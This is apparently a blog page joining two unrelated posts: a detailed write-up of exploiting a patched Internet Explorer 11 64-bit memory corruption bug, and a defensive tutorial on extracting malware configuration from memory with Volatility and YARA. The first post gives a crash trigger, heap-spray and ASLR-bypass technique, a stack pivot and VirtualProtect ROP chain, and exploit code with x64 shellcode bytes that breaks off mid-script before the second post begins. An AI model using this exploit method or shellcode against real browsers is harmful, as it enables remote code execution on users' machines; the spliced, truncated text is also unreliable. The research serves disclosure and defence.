Thứ Tư, 6 tháng 11, 2013

Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview

Note: The vulnerability described here has been patched by Microsoft in October 2013 security update.
Earlier this year, Microsoft announced several security bounty programs one of which was a bounty program for bugs in Internet Explorer 11. I participated in this program and relatively quickly found a memory corruption bug. Although I believed the bug could be exploited for remote code execution, due to lack of time (I just became a father right before the bounty programs started so I had other preoccupations) I haven’t actually developed a working exploit at the time. However, I was interested in the difficulty of writing an exploit for the new OS and browser version so I decided to try to develop an exploit later. In this post, I’ll first describe the bug and then the development of a working exploit for it on 64-bit Windows 8.1 Preview.
When setting out to develop the exploit I didn't strive to make a 100% reliable exploit (The specifics of the bug would have made it difficult and my goal was to experiment with the new platform and not make the next cyber weapon), however I did set some limitations for myself that would make the exercise more challenging:
1. The exploit should not rely on any plugins (so no Flash and no Java). I wanted it to work on the default installation.
2. The exploit must work on 64-bit IE and 64-bit Windows. Because 32-bit would be cheating as many exploit mitigation techniques (such as heap base randomization) aren't really effective on 32-bit OS or processes. Additionally, there aren't many 64-bit Windows exploits out there.
3. No additional vulnerabilities should be used (e.g. for ASLR bypass)
One prior note about exploiting 64-bit Internet Explorer: In Windows 8 and 8.1, when running IE on the desktop (“old interface”) the renderer processes of IE will be 32-bit even if the main process is 64-bit. If the new (“touch screen”) interface is used everything is 64-bit. This is an interesting choice and makes the desktop version of IE less secure. So in the default environment, the exploit shown here actually targets the touch screen interface version of IE.
To force IE into using 64-bit mode on the desktop for exploit development, I forced IE to use single process mode (TabProcGrowth registry key). However note that this was used for debugging only and, if used for browsing random pages, it will make IE even less secure because it disables the IE’s sandbox mode.

The bug

A minimal sample that triggers the bug is shown below.

<script>
function bug() {
 t = document.getElementsByTagName("table")[0];
 t.parentNode.runtimeStyle.posWidth = "";
 t.focus();
}
</script>
<body onload=bug()>
<table><th><ins>aaaaaaaaaa aaaaaaaaaa

And here is the the debugger output.

(4a8.440): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
MSHTML!Layout::ContainerBox::ContainerBox+0x1e6:
00007ff8`e0c90306 488b04d0        mov     rax,qword ptr [rax+rdx*8] ds:000000a6`e1466168=????????????????
0:010> r
rax=000000a6d1466170 rbx=000000a6d681c360 rcx=000000000000007f
rdx=0000000001ffffff rsi=000000a6d5960330 rdi=00000000ffffffff
rip=00007ff8e0c90306 rsp=000000a6d61794b0 rbp=000000a6d5943a90
r8=0000000000000001  r9=0000000000000008 r10=00000000c0000034
r11=000000a6d61794a0 r12=00000000ffffffff r13=00000000ffffffff
r14=000000000000000b r15=00000000ffffffff
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
MSHTML!Layout::ContainerBox::ContainerBox+0x1e6:
00007ff8`e0c90306 488b04d0        mov     rax,qword ptr [rax+rdx*8] ds:000000a6`e1466168=????????????????
0:010> k
Child-SP          RetAddr           Call Site
000000a6`d61794b0 00007ff8`e0e49cc0 MSHTML!Layout::ContainerBox::ContainerBox+0x1e6
000000a6`d6179530 00007ff8`e0e554a8 MSHTML!Layout::TableGridBox::TableGridBox+0x38
000000a6`d6179590 00007ff8`e0e553c2 MSHTML!Layout::TableGridBoxBuilder::CreateTableGridBoxBuilder+0xd8
000000a6`d6179600 00007ff8`e0c8b720 MSHTML!Layout::LayoutBuilder::CreateLayoutBoxBuilder+0x2c9
000000a6`d61796c0 00007ff8`e0c8a583 MSHTML!Layout::LayoutBuilderDriver::StartLayout+0x85f
000000a6`d61798d0 00007ff8`e0c85bb2 MSHTML!Layout::PageCollection::FormatPage+0x287
000000a6`d6179a60 00007ff8`e0c856ae MSHTML!Layout::PageCollection::LayoutPagesCore+0x2aa
000000a6`d6179c00 00007ff8`e0c86389 MSHTML!Layout::PageCollection::LayoutPages+0x18e
000000a6`d6179c90 00007ff8`e0c8610f MSHTML!CMarkupPageLayout::CalcPageLayoutSize+0x251
000000a6`d6179db0 00007ff8`e0df85ca MSHTML!CMarkupPageLayout::CalcTopLayoutSize+0xd7
000000a6`d6179e70 00007ff8`e12d472d MSHTML!CMarkupPageLayout::DoLayout+0x76
000000a6`d6179eb0 00007ff8`e0d9de95 MSHTML!CView::EnsureView+0xcde
000000a6`d617a270 00007ff8`e0d1c29e MSHTML!CElement::EnsureRecalcNotify+0x135
000000a6`d617a310 00007ff8`e1556150 MSHTML!CElement::EnsureRecalcNotify+0x1e
000000a6`d617a350 00007ff8`e1555f6b MSHTML!CElement::focusHelperInternal+0x154
000000a6`d617a3b0 00007ff8`e19195ee MSHTML!CElement::focus+0x87
000000a6`d617a400 00007ff8`e06ed862 MSHTML!CFastDOM::CHTMLElement::Trampoline_focus+0x52
000000a6`d617a460 00007ff8`e06f0039 jscript9!amd64_CallFunction+0x82
000000a6`d617a4b0 00007ff8`e06ed862 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x154
000000a6`d617a550 00007ff8`e06f26ff jscript9!amd64_CallFunction+0x82

As can be seen above, IE crashes in MSHTML!Layout:ContainerBox:ContainerBox function while attempting to read uninitialized memory pointed to by rax + rdx*8. rax actually points to valid memory that contains a CFormatCache object (which looks correct given the PoC), while the value of rdx (0x0000000001ffffff) is interesting. So I looked at the code of ContainerBox:ContainerBox function to see where this value comes from and also what can be done if an attacker would control the memory at rax + 0xffffff8.

00007ffb`dac00145 83cdff          or      ebp,0FFFFFFFFh
...
00007ffb`dac0023e 440fb64713      movzx   r8d,byte ptr [rdi+13h]
00007ffb`dac00243 410fb6c0        movzx   eax,r8b
00007ffb`dac00247 c0e805          shr     al,5
00007ffb`dac0024a 2401            and     al,1
00007ffb`dac0024c 0f84048f6200    je      MSHTML!Layout::ContainerBox::ContainerBox+0x562 (00007ffb`db229156)
00007ffb`dac00252 440fb76f68      movzx   r13d,word ptr [rdi+68h]
...
00007ffb`db229156 448bed          mov     r13d,ebp
00007ffb`db229159 e9f9709dff      jmp     MSHTML!Layout::ContainerBox::ContainerBox+0x137 (00007ffb`dac00257)
...
00007ffb`dac002db 410fbffd        movsx   edi,r13w
...
00007ffb`dac002fb 8bcf            mov     ecx,edi
00007ffb`dac002fd 8bd7            mov     edx,edi
00007ffb`dac002ff 48c1ea07        shr     rdx,7
00007ffb`dac00303 83e17f          and     ecx,7Fh
00007ffb`dac00306 488b04d0        mov     rax,qword ptr [rax+rdx*8] ds:0000007a`390257f8=????????????????
00007ffb`dac0030a 488d0c49        lea     rcx,[rcx+rcx*2]
00007ffb`dac0030e 488d14c8        lea     rdx,[rax+rcx*8]
00007ffb`dac00312 8b4cc810        mov     ecx,dword ptr [rax+rcx*8+10h]
00007ffb`dac00316 8b420c          mov     eax,dword ptr [rdx+0Ch]
00007ffb`dac00319 3bc8            cmp     ecx,eax
00007ffb`dac0031b 0f83150d7500    jae     MSHTML!Layout::ContainerBox::ContainerBox+0x750f16 (00007ffb`db351036)
00007ffb`dac00321 ffc0            inc     eax
00007ffb`dac00323 89420c          mov     dword ptr [rdx+0Ch],eax

The value of rdx at the time of crash comes after several assignments from the value of ebp which is initialized to 0xFFFFFFFF near the beginning of the function (note that ebp/rbp is not used as the frame pointer here). My assumption is that the value 0xFFFFFFFF (-1) is an initial value of variable used as an index into CFormatCache. Later in the code, a pointer to a CTreeNode is obtained, a flag in the CTreeNode is examined and if it is set, the index value is copied from the CTreeNode object. However, if the flag is not set (as is the case in the PoC), the initial value is used. The value 0xFFFFFFFF is then split into two parts, upper and lower (it looks like CFormatCache is implemented as a 2D array). A value of the higher index (will be equal to 0x1ffffff) will be multiplied by 8 (size of void*), this offset is added to rax and the content at this memory location is written back to rax. Then, a value of the lower index (will be 0x7f) is multiplied with 24 (presumably the size of CCharFormat element), this offset is added to eax and the content of this memory location is written to rdx. Finally, and this is the part relevant for exploitation, a number at [rdx+0C] is taken, increased, and then written back to [rdx+0C].

Written in C++ and simplified a bit, the relevant code would look like this:

int cacheIndex = -1;
if(treeNode->flag) {
  cacheIndex = treeNode->cacheIndex;
} 
unsigned int index_hi = cacheIndex, index_lo = cacheIndex;
index_hi = index_hi >> 7;
index_lo = index_lo & 0x7f;
//with sizeof(formatCache[i]) == 8 and sizeof(formatCache[i][j]) == 24
formatCache[index_hi][index_lo].some_number++; 

For practical exploitation purposes, what happens is this: A pointer to valid memory (CFormatCache pointer) is increased by 0x0FFFFFF8 (256M) and the value at this address is treated as another pointer. Let’s call the address (CFormatCache address + 0x0FFFFFF8) P1 and the address it points to P2. The DWORD value at (P2 + BF4) will be increased by 1 (Note: BF4 is computed as 0x7F * 3 * 8 + 0x0C).

The exploit

If we were writing an exploit for a 32-bit process, a straightforward (though not very clean) way to exploit the bug using heap spraying would be to spray with a 32-bit number such that when BF4 is added to it, an address of something interesting (e.g. string or array length) is obtained. An “address of something interesting” could be predicted by having another heap spray consisting of “interesting objects”.

Since the exploit is being written for 64-bit process with full ASLR, we won’t know or be able to guess an address of an “interesting” object. We certainly won’t be able to fill an address space of a 64-bit process and heap base will be randomized, thus making addresses of objects on the heap unpredictable.
Heap spraying lives

However, even in this case, heap spraying is still useful for the first part of the exploit. Note that when triggering the bug, P1 is calculated as a valid heap address increased by 0x0FFFFFF8 (256M). And if we heap spray, we are allocating memory relative to the heap base. Thus, by spraying approximately 256M of memory we can set P2 to arbitrary value.
So to conclude, despite significantly larger address space in 64-bit processes and heap base randomization, heap spraying is still useful in cases where we can make a vulnerable application dereference memory at a valid heap address + a large offset. As this is a typical behavior for bounds checking vulnerabilities, it’s not altogether uncommon. Besides the bug being discussed here, the previous IE bug I wrote about exploiting here also exhibits this behavior.
Although heap spraying is often avoided in modern exploits in favor of the more reliable alternatives, given a large (fixed) offset of 256M, it is pretty much required in this case. And although the offset is fixed, it’s a pretty good value as far as heap spraying goes. Not too large to cause memory exhaustion and not too small to cause major reliability issues (other than those from using heap spraying in the first place).

Look Ma, no Flash

But the problem of not being able to guess an address of an interesting object still remains, and thus the question is, what do we heap spray with? Well, instead of heap spraying with the exact values, we can spray with pointers instead. Since an offset of 0xBF4 is added to P2 before increasing the value it points to, we’ll spray with an address of some object and try to make this address + 0xBF4 point to something of interest.
So what should “something of interest” be? The first thing I tried is a length of a JavaScript string as in here. And although I was able to align the stars to overwrite higher dword of a qword containing a string length, a problem arose: JavaScript string length is treated as a 32-bit number. Note that most pointers (including those we can easily use in our heap spray) on 64-bit will be qword aligned and when adding an offset of 0xBF4 to such a pointer we will end up with a pointer to higher dword in a qword-aligned memory. So an interesting value needs to either be 64-bit or not qword aligned.
Another idea was to try to overwrite an address. However, note that triggering the bug would increase the address by 4GB as (assuming a qword-aligned address) we are increasing the higher dword. To control the content at this address we would need another heap spray of ~4G data and this would cause memory issues on computers with less free RAM than that. Incidentally, the computer I ran Windows 8.1 Preview VM on had only 4GB of RAM and the Windows 8.1 VM had just 2GB of RAM so I decided to drop this idea and look at alternatives.
In several recent exploits used in the wild, a length of a Flash array was overwritten to leverage a vulnerability. While Flash was off limits in this exercise, let’s take a look at JavaScript arrays in IE 11 instead. As it turns out, there is an interesting value that is correctly aligned. An example JavaScript Array object with explanation of some of the fields is shown below. Note that the actual array content may be split across several buffers.



offset:0, size:8 vtable ptr
offset:0x20, size:4 array length
offset:0x28, size:8 pointer to the buffer containing array data
[beginning of the first buffer, stored together with the array]
offset:0x50, size:4 index of the first element in this buffer
offset:0x54, size:4 number of elements currently in the buffer
offset:0x58, size:4 buffer capacity
offset:0x60, size:8 ptr to the next buffer
offset:0x68, size:varies array data stored in the buffer

Although it’s not necessary for understanding the exploit, here’s also an example String object with explanation of some of the fields.



offset:0, size:8 vtable ptr
offset:0x10, size:4 string length
offset:0x18, size:8 data ptr

As can be seen from above, the “number of elements currently in the buffer” of a JavaScript array is not qword-aligned and is a value that might be interesting to overwrite.
This is indeed the value I ended up going for. To accomplish this, I got the memory aligned as seen in the image below.



We’ll heap spray with pointers to a JavaScript String object by creating large JavaScript arrays where each element of the array will be the same string object. We’ll also get memory aligned in such a way that, at an offset 0xBF4 from the start of the string, there will be a a part of a JavaScript array that holds the value we want to overwrite.
You might wonder why I heap sprayed with pointers to String and not an Array object. The reason for this is that the String object is much smaller (32 bytes vs. 128 bytes) so by having multiple strings close to one another and pointing to a specific one, we can better “aim” for a specific offset inside an Array object. Of course, if we have several strings close to one another, the question becomes which one to use in a heap spray. Since an Array object is 4 time the size of a String, there are four different offsets in the Array we can overwrite. By choosing randomly, in one case (with probability 1/4), we will overwrite exactly what we want. In one case, we will overwrite an address that will cause a crash on a subsequent access of the array. And in the remaining two cases, we will overwrite values that are not important and we would be able to try again by spraying with a pointer to a different string. Thus a blind guess will give success probability of 1/4 while a try/retry approach would give a probability of success of 3/4 (if you know your statistics, you might think that this number is wrong, but we can actually avoid crashes after an incorrect but non-fatal attempt by trying different strings in a descending order). An even better approach would be to disclose the string offsets by first aligning memory in a way to put something readable at an offset 0xBF4 from the String object used in the heap spray. While I have observed that this is possible, this isn’t implemented in the provided exploit code and is left as an exercise for the reader. Refer to the next section for information that could help you to achieve such alignment.
In the exploit code provided, a naive (semi)blind-guess approach is used where there is a large array of Strings (strarr) and a string at a constant index is used for the heap spray. I have observed that this works reliably for me when opening the PoC in a new process/tab (so I didn’t have any other JavaScript objects in the current process). If you want to play with the exploit and the index I used doesn’t work for you, you’ll likely need to pick a different one or implement one of the approaches described above.

Feng Shui in JavaScript heap

Before moving on with the exploit, let’s first take some time to examine how it’s possible to heap spray in IE11 and get a correct object alignment on heap with a high reliability.
Firstly, heap spraying: While Microsoft has made it rather difficult to heap spray with JavaScript strings, JavaScript arrays in IE11 appear not to prevent this in any way. It’s possible to spray both with pointers (as seen above) as well as with absolute values by e.g. creating a large array of integers. While many recent IE exploits use Flash for heap spraying, it’s not necessary and, given the current Array implementation and improved speed over the predecessors, JavaScript arrays might just be the object of choice to implement heap spraying in IE in the future.
Secondly, alignment of objects on heap: While the default Heap implementation in Windows 8 and above (the low fragmentation heap) includes several mitigations that make getting the desired alignment difficult, such as guard pages and allocation order randomization, in IE11 basic JavaScript objects (such as Arrays and Strings) use a custom heap implementation that has none of these features.
I’ll shortly describe what I observed about this JavaScript heap implementation. Note that all of the below is based on observation of the behavior and not reverse-engineering the code, so I might have made some wrong conclusions, but it works as described for the purposes of the given exploit.
The space for the JavaScript objects is allocated in blocks of 0x20000 bytes. If more space is needed, additional blocks will be allocated and there is nothing preventing these blocks to be right next to one another (so a theoretical overflow in one block could write into another).
These blocks are further divided into bins of 0x1000 bytes (at least for small objects). One bin will only hold objects of the same size and possibly type. So for example, in this exploit where we have String and Array objects of size 32 and 128 bytes respectively, some bins will hold only String objects (128 of them at most), while some of them will hold only Array objects (32 of them at most). When a bin is fully used, it contains only the “useful” content and no metadata. I have also observed that the objects are stored in separate 0x20000-size blocks than the user-provided content, so string and array data will be stored in different blocks than the corresponding String and Array objects, except when the data is small enough to be stored together with the object (e.g. single-character strings, small arrays like the 5-element ones in the exploit).
The allocation order of objects inside a given bin is sequential. That means that, e.g. if we create three String objects in close succession and assuming no holes in any of the bins, they will be next to each other with the first one having the lowest address, followed by the second followed by the third.

And now, for my next trick

So at this point we can increment the number of elements in the JavaScript array. In fact, we’ll trigger the vulnerability multiple times (5 times in the provided exploit, where each trigger will increase this number by 3) in order to increase it a bit more. Unfortunately, increasing the number of elements does not allow us to write data past the end of the buffer, but it does allow us to read data past the end. This is sufficient at this point because it allows us to break ASLR and learn the precise address of the Array object we overwrote.
Knowing the address of the Array object, we can repeat the heap spray, but this time, we’ll spray with exact values (I used Array of integers to spray with the exact values). A value we are going to spray with is going to be an address of buffer capacity of an array decreased by 0xBF1. This means that that the spray value + 0xBF4 will be the address of the highest byte of the buffer capacity value. After the buffer capacity has been overwritten, we’ll be able to both read and write data past the end of the JS Array’s buffer.
From here, we can quite easily get the two important elements that constitute a modern browser exploit: The ability to read arbitrary memory and to gain control over RIP.
We can read arbitrary memory by scanning the memory after the Array for a String object and then overwriting the data pointer and (if we want to read larger data) size of the string.
We can get control over RIP by overwriting a vtable pointer of a nearby Array object and triggering a virtual method call. While IE10 introduced Virtual Table Guard (vtguard) for some classes in mshtml.dll, jscript9.dll has no such protections. However note that, having arbitrary memory disclosure, even if vtguard was present it would be just a minor annoyance.

64-bit exploits for 32-bit exploit writers

With control over RIP and memory disclosure, we’ll want to construct a ROP chain in order to defeat DEP. As we don’t control the stack, the first thing we need is a stack pivot gadget. So, with arbitrary memory disclosure it should be easy to search for xchg rax,rsp; ret; in some executable module, right? Well, no. As it turns out, in x64, stack pivot gadgets are much less common than in x86 code. On x86, xchg eax,esp; ret; will be just 2 bytes in size, so there will be many unintended sequences like that. On x64 xchg rax,rsp; is 3 bytes which makes it much less common. Having not found it (or any other “clean” stack pivot gadgets) in mshtml.dll and jscript9.dll, I had to look for alternatives. After a look at mshtml.dll I found a stack pivot sequence shown below which isn’t very clean but does the trick assuming both rax and rcx point to a readable memory (which is the case here).

00007ffb`265ea973 50              push    rax
00007ffb`265ea974 5c              pop     rsp
00007ffb`265ea975 85d2            test    edx,edx
00007ffb`265ea977 7408            je      MSHTML!CTableLayout::GetLastRow+0x25 (00007ffb`265ea981)
00007ffb`265ea979 8b4058          mov     eax,dword ptr [rax+58h]
00007ffb`265ea97c ffc8            dec     eax
00007ffb`265ea97e 03c2            add     eax,edx
00007ffb`265ea980 c3              ret
00007ffb`265ea981 8b8184010000    mov     eax,dword ptr [rcx+184h]
00007ffb`265ea987 ffc8            dec     eax
00007ffb`265ea989 c3              ret

Note that, while there is a conditional jump in the sequence, both branches end with RET and won’t cause a crash so they both work well for our purpose. While the exploit mostly relies on jscript9 objects, an address of (larger) mshtml.dll module can be easily obtained using memory disclosure by pushing a mshtml object into a JS array object we can read and then following references from the array to mshtml object and its vtable.
After the control of the stack is gained, we can call VirtualProtect to make a part of heap we can write to executable. We can find the address of VirtualProtect in the IAT of mshtml.dll (the exploit includes some very basic PE32+ parsing). So, with the address of VirtualProtect and control over the stack, we can now just put the correct arguments of on the stack and return into VirtualProtect, right? Well, no. In 64-bit Windows, a different calling convention is used than in 32-bit. 64-bit Windows uses a fastcall convention where the first 4 arguments (which is exactly the number of arguments VirtualProtect has) are passed through registers RCX, RDX, R8 and R9 (in that order). So we need some additional gadgets to load the correct argument into the correct registers:

pop rcx; ret;
pop rdx; ret;
pop r8; ret;
pop r9; ret;

As it turns out the first three are really common in mshtml.dll. The forth one isn’t, however for VirtualProtect the last argument just needs to point to a writeable memory which is already the case at the time we get control over RIP, so we don’t actually have to change r9.
The final ROP chain looks like this:

address of pop rcx; ret;
address on the heap block with shellcode
address of pop rdx; ret;
0x1000 (size of the memory that we want to make executable)
address of pop r8; ret;
0x40 (PAGE_EXECUTE_READWRITE)
address of VirtualProtect
address of shellcode

So, we can now finally execute some x64 shellcode like SkyLined’s x64 calc shellcode that works on 64-bit Windows 7 and 8, right? Well, no. Shellcode authors usually (understandably) prefer small shellcode size over generality and save space by relying on specifics of the OS that don’t need to be true in the future versions. For example, for compatibility reasons, Windows 7 and 8 store PEB, module information structures as well as ntdll and kernel32 modules at addresses lower than 2G. This is no longer true in Windows 8.1 Preview. Also, while Windows x64 fastcall calling convention requires leaving 32 bytes of shadow space on the stack for the use of calling function, SkyLined’s win64-exec-calc-shellcode leaves just 8 bytes before calling WinExec. While this appears to work on Windows 7 and 8, on Windows 8.1 preview it will cause the command string (“calc” in this case) stored on the stack to be overwritten as it will be stored in WinExec’s shadow space. To resolve these compatibility issues I made modifications to the shellcode which I provided in the exploit. It should now work on Windows 8.1.
That’s it, finally we can execute the shellcode and have thus proven arbitrary code execution. As IE is fully 64-bit only in the touch screen mode, I don’t have a cool screenshot of Windows Calculator popped over it (calc is shown on the desktop instead). But I do have a screenshot of the desktop with IE forced into a single 64-bit process.



The full exploit code can be found at the end of this blog post.

Conclusion

Although Windows 8/8.1 packs an impressive arsenal of memory corruption mitigations, memory corruption exploitation is still alive and kicking. Granted, some vulnerability classes might be more difficult to exploit, but the vulnerability presented here was the first one I found in IE11 and there are likely many more vulnerabilities that can be exploited in a similar way. The exploit also demonstrates that, under some conditions, heap spraying is still useful even in 64-bit processes. In general, while there have been a few cases where it was more difficult to write parts of the exploit on x64 than it would be on x86 (such as finding what to spray with and overwrite, finding stack pivot sequences etc.), the difficulties wouldn't be sufficient to stop a determined attacker.
Finally, based on what I've seen, here are a few ideas to make writing exploits for IE11 on Windows 8.1 more difficult:
  • Consider implementing protection against heap spraying with JavaScript arrays. This could be implemented by RLE-encoding large arrays that consist of a single repeated value or several repeated values.
  • Consider implementing the same level of protection for the JavaScript heap as for the default heap implementation - add guard pages and introduce randomness.
  • Consider implementing Virtual Table Guard for common JavaScript objects.
  • Consider making compiler changes to remove all stack pivot sequences from the generated code of common modules. These are already scarce in x64 code so there shouldn't be a large performance impact.


Appendix: Exploit Code

<script>
 
 var magic = 25001; //if the exploit doesn't work for you try selecting another number in the range 25000 -/+ 128
 var strarr = new Array();
 var arrarr = new Array();
 var sprayarr = new Array();
 var numsploits;
 var addrhi,addrlo;
 var arrindex = -1;
 var strindex = -1;
 var strobjidx = -1;
 var mshtmllo,mshtmlhi;

 //calc shellcode, based on SkyLined's x64 calc shellcode, but fixed to work on win 8.1
 var shellcode = [0x40, 0x80, 0xe4, 0xf8, 0x6a, 0x60, 0x59, 0x65, 0x48, 0x8b, 0x31, 0x48, 0x8b, 0x76, 0x18, 0x48, 0x8b, 0x76, 0x10, 0x48, 0xad, 0x48, 0x8b, 0x30, 0x48, 0x8b, 0x7e, 0x30, 0x03, 0x4f, 0x3c, 0x8b, 0x5c, 0x0f, 0x28, 0x8b, 0x74, 0x1f, 0x20, 0x48, 0x01, 0xfe, 0x8b, 0x4c, 0x1f, 0x24, 0x48, 0x01, 0xf9, 0x31, 0xd2, 0x0f, 0xb7, 0x2c, 0x51, 0xff, 0xc2, 0xad, 0x81, 0x3c, 0x07, 0x57, 0x69, 0x6e, 0x45, 0x75, 0xf0, 0x8b, 0x74, 0x1f, 0x1c, 0x48, 0x01, 0xfe, 0x8b, 0x34, 0xae, 0x48, 0x01, 0xf7, 0x68, 0x63, 0x61, 0x6c, 0x63, 0x54, 0x59, 0x31, 0xd2, 0x48, 0x83, 0xec, 0x28, 0xff, 0xd7, 0xcc, 0, 0, 0, 0];

//triggers the bug
function crash(i) {
 numsploits = numsploits + 1;
 t = document.getElementsByTagName("table")[i];
 t.parentNode.runtimeStyle.posWidth = -1;
 t.focus();
 setTimeout(cont, 100);  
}

//heap spray

Thứ Ba, 29 tháng 10, 2013

Dumping Malware Configuration Data from Memory with Volatility

When I first start delving in memory forensics, years ago, we relied upon controlled operating system crashes (to create memory crash dumps) or the old FireWire exploit with a special laptop. Later, software-based tools like regular dd, and win32dd, made the job much easier (and more entertaining as we watched the feuds between mdd and win32dd).

In the early days, our analysis was basically performed with a hex editor. By collecting volatile data from an infected system, we'd attempt to map memory locations manually to known processes, an extremely frustrating and error-prone procedure. Even with the advent of graphical tools such as HBGary Responder Pro, which comes with a hefty price tag, I've found most of my time spent viewing raw memory dumps in WinHex.

The industry has slowly changed as tools like Volatility have gained maturity and become more feature-rich. Volatility is a free and open-source memory analysis tool that takes the hard work out of mapping and correlating raw data to actual processes. At first I shunned Volatility for it's sheer amount of command line memorization, where each query required memorizing a specialized command line. Over the years, I've come to appreciate this aspect and the flexibility it provides to an examiner.

It's with Volatility that I focus the content for this blog post, to dump malware configurations from memory.

For those unfamiliar with the concept, it's rare to find static malware. That is, malware that has a plain-text URL in its .rdata section mixed in with other strings. Modern malware tends to be more dynamic, allowing for configurations to be downloaded upon infection, or be strategically injected into the executable by its author. Crimeware malware (Carberp, Zeus) tend to favor the former, connecting to a hardcoded IP address or domain to download a detailed configuration profile (often in XML) that is used to determine how the malware is to operate. What domains does it beacon to, on which ports, and with what campaign IDs - these are the items we determine from malware configurations.

Other malware rely upon a known block of configuration data within the executable, sometimes found within .rdata or simply in the overlay (the data after the end of the actual executable). Sometimes this data is in plain text, often it's encoded or encrypted. A notable example of this is in Mandiant's APT1 report on TARSIP-MOON, where a block of encrypted data is stored in the overlay. The point of this implementation is that an author can compile their malware, and then add in the appropriate configuration data after the fact.

As a method to improving the timeliness of malware analysis, I've been advocating for greater research and implementation of configuration dumpers. By identifying where data is stored within the file, and by knowing its encryption routine, one could simply write a script to extract the data, decrypt it, and print it out. Without even running the malware we know its intended C2 communications and have immediate signatures that we can then implement into our network defenses.

While this data may appear as a simple structure in plaintext in a sample, often it's encoded or encrypted via a myriad of techniques. Often this may be a form of encryption that we, or our team, deemed as too difficult to decrypt in a reasonable time. This is pretty common, advanced encryption or compression can often take weeks to completely unravel and is often left for when there's downtime in operations.

What do we do, then? Easy, go for the memory.

We know that the malware has a decryption routine that intakes this data and produces decrypted output. By simply running the malware and analyzing its memory footprint, we will often find the decrypted results in plaintext, as it has already been decrypted and in use by the malware.

Why break the encryption when we can let the malware just decrypt it for us?



For example, the awesome people at Malware.lu released a static configuration dumper for a known Java-based RAT. This dumper, available here on their GitHub repo, extracts the encryption key and configuration data from the malware's Java ZIP and decrypts it. It uses Triple DES (TDEA), but once that routine became public knowledge, the author quickly switched to a new routine. The author has then continued switching encryption routines regularly to avoid easy decryption. Based on earlier analysis, we know that the data is decrypted as:

Offset      0  1  2  3  4  5  6  7   8  9 10 11 12 13 14 15

00000000   70 6F 72 74 3D 33 31 33  33 37 53 50 4C 49 54 01   port=31337SPLIT.
00000016   6F 73 3D 77 69 6E 20 6D  61 63 53 50 4C 49 54 01   os=win macSPLIT.
00000032   6D 70 6F 72 74 3D 2D 31  53 50 4C 49 54 03 03 03   mport=-1SPLIT...
00000048   70 65 72 6D 73 3D 2D 31  53 50 4C 49 54 03 03 03   perms=-1SPLIT...
00000064   65 72 72 6F 72 3D 74 72  75 65 53 50 4C 49 54 01   error=trueSPLIT.
00000080   72 65 63 6F 6E 73 65 63  3D 31 30 53 50 4C 49 54   reconsec=10SPLIT
00000096   10 10 10 10 10 10 10 10  10 10 10 10 10 10 10 10   ................
00000112   74 69 3D 66 61 6C 73 65  53 50 4C 49 54 03 03 03   ti=falseSPLIT...
00000128   69 70 3D 77 77 77 2E 6D  61 6C 77 61 72 65 2E 63   ip=www.malware.c
00000144   6F 6D 53 50 4C 49 54 09  09 09 09 09 09 09 09 09   omSPLIT.........
00000160   70 61 73 73 3D 70 61 73  73 77 6F 72 64 53 50 4C   pass=passwordSPL
00000176   49 54 0E 0E 0E 0E 0E 0E  0E 0E 0E 0E 0E 0E 0E 0E   IT..............
00000192   69 64 3D 43 41 4D 50 41  49 47 4E 53 50 4C 49 54   id=CAMPAIGNSPLIT
00000208   10 10 10 10 10 10 10 10  10 10 10 10 10 10 10 10   ................
00000224   6D 75 74 65 78 3D 66 61  6C 73 65 53 50 4C 49 54   mutex=falseSPLIT
00000240   10 10 10 10 10 10 10 10  10 10 10 10 10 10 10 10   ................
00000256   74 6F 6D 73 3D 2D 31 53  50 4C 49 54 04 04 04 04   toms=-1SPLIT....
00000272   70 65 72 3D 66 61 6C 73  65 53 50 4C 49 54 02 02   per=falseSPLIT..
00000288   6E 61 6D 65 3D 53 50 4C  49 54 06 06 06 06 06 06   name=SPLIT......
00000304   74 69 6D 65 6F 75 74 3D  66 61 6C 73 65 53 50 4C   timeout=falseSPL
00000320   49 54 0E 0E 0E 0E 0E 0E  0E 0E 0E 0E 0E 0E 0E 0E   IT..............
00000336   64 65 62 75 67 6D 73 67  3D 74 72 75 65 53 50 4C   debugmsg=trueSPL
00000352   49 54 0E 0E 0E 0E 0E 0E  0E 0E 0E 0E 0E 0E 0E 0E   IT..............

Or, even if we couldn't decrypt this, we know that it's beaconing to a very unique domain name and port which can be searched upon. Either way, we now have a sample where we can't easily get to this decrypted information. So, let's solve that.

By running the malware within a VM, we should have a logical file for the memory space. In VMWare, this is a .VMEM file (or .VMSS for snapshot memory). In VirtualBox, it's a .SAV file. After running our malware, we suspend the guest operating system and then focus our attention on the memory file.

The best way to start is to simply grep the file (from the command line or a hex editor) for the unique C2 domains or artifacts. This should get us into the general vicinity of the configuration and show us the structure of it:

E:\VMs\WinXP_Malware>grep "www.malware.com" *
Binary file WinXP_Malware.vmem matches

With this known, we open the VMEM file and see a configuration that matches that of what we've previously seen. This tells us that the encryption routine changed, but not that of the configuration, which is common. This is where we bring out Volatility.

Searching Memory with Volatility

We know that the configuration data begins with the text of "port=<number>SPLIT", where "SPLIT" is used to delimit each field. This can then be used to create a YARA rule of:

rule javarat_conf {
    strings: $a = /port=[0-9]{1,5}SPLIT/ 
    condition: $a
}

This YARA rule uses the regular expression structure (defined with forward slashes around the text) to search for "port=" followed by a number that is 1 - 5 characters long. This rule will be used to get us to the beginning of the configuration data. If there is no good way to get to the beginning, but only later in the data, that's fine. Just note that offset variance between where the data should start and where the YARA rule puts us.

Let's test this rule with Volatility first, to ensure that it works:

E:\Development\volatility>vol.py -f E:\VMs\WinXP_Malware\WinXP_Malware.vmem yarascan -Y "/port=[0-9]{1,5}SPLIT/"
Volatile Systems Volatility Framework 2.3_beta
Rule: r1
Owner: Process VMwareUser.exe Pid 1668
0x017b239b  70 6f 72 74 3d 33 31 33 33 37 53 50 4c 49 54 2e   port=31337SPLIT.
0x017b23ab  0a 30 30 30 30 30 30 31 36 20 20 20 36 46 20 37   .00000016...6F.7
0x017b23bb  33 20 33 44 20 37 37 20 36 39 20 36 45 20 32 30   3.3D.77.69.6E.20
0x017b23cb  20 36 44 20 20 36 31 20 36 33 20 35 33 20 35 30   .6D..61.63.53.50
Rule: r1
Owner: Process javaw.exe Pid 572
0x2ab9a7f4  70 6f 72 74 3d 33 31 33 33 37 53 50 4c 49 54 01   port=31337SPLIT.
